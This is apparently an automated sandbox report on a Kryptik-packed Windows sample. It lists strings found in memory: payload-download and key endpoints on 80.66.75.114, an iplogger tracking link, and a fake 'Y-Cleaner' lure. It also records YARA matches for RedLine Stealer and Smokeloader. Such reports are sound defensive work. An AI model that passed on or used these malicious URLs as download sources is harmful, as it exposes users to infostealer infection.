Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1807109955.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1829919159.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1875503102.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2953600985.000000000087D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1852740816.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/dll/download
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1807109955.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1829919159.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1875503102.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1852740816.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/dll/downloadxA
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2953600985.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/dll/key
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2953600985.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/dll/keym7n
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/files/download
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1807109955.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1829919159.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1875503102.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2953600985.000000000087D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1852740816.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/files/download3
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/files/download4/files/download
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1829919159.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1852740816.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/files/download4/files/downloadE
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/files/download4/files/downloadu
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1875503102.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/files/download9
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1807109955.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1829919159.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1875503102.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2953600985.000000000087D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1852740816.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/files/download?
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/files/downloadA
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1875503102.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1852740816.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/files/downloadData
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1807109955.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1875503102.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/files/downloadE
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1829919159.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1875503102.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2953600985.000000000087D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1852740816.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/files/downloadLMEM
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/files/downloadQ
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/files/downloadZv
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/files/downloadtem32
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1807109955.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1829919159.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1875503102.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1852740816.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/files/downloadu
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1875503102.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/files/downloadw
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2953600985.0000000000851000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1790805562.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/name
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1790805562.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/name-6.
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2953600985.0000000000851000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1790805562.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/name=7
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1790805562.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/nameQ?
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1790805562.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/namem7n
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2953600985.000000000087D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/soft/download
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/soft/download14/soft/download
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2953600985.000000000087D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/soft/download9
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/soft/downloadE
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/soft/downloadQ
Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2098391293.0000000002F9F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095635491.0000000002DE5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2096994132.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2096994132.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2102473420.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2098475766.0000000002FE2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2101179469.0000000002F9F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2099803933.0000000003061000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2098391293.0000000002F9F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095635491.0000000002DE5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2096994132.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2096994132.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2102473420.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2098475766.0000000002FE2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2101179469.0000000002F9F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2099803933.0000000003061000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://g-cleanit.hk
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2098391293.0000000002F9F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095635491.0000000002DE5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2096994132.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2096994132.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2102473420.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2098475766.0000000002FE2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2101179469.0000000002F9F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2099803933.0000000003061000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://iplogger.org/1Pz8p7

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.2953574713.00000000007AA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_00402C600_2_00402C60
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_00408E600_2_00408E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_004159000_2_00415900
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0040E9900_2_0040E990
